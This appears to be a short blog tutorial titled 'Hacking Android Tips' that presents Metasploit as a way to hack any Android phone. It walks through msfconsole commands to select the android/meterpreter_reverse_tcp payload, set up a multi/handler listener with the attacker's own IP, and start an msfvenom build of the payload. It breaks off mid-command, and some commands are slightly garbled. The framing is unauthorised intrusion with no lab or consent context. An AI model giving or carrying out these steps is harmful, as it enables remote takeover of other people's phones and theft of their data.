Postingan

HACKING ANDROID TIPS

 Hello everyone !! We use metasploit framework for hack any android phone. First I tell you what is metasploit framework? The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7. Metasploit written in Ruby Programming Language.    Now How to use Metasploit for creating payload   Step: Boot up your kali linux . Open terminal first check IP address. Clear screen and type "msfconsole q" Then type "grep android show payloads" Chosse this payload android/meterpreter_reverse_tcp  Then type use exploit/multi/handler set payload android/meterpreter_reverse_tcp  set lhost: ___________( your kali linux IP address) options (If any option not fill first fill that option then move next step) Open another terminal and type " msfvenom -p android/meterpreter_reverse_tcp lhost:____ lpo...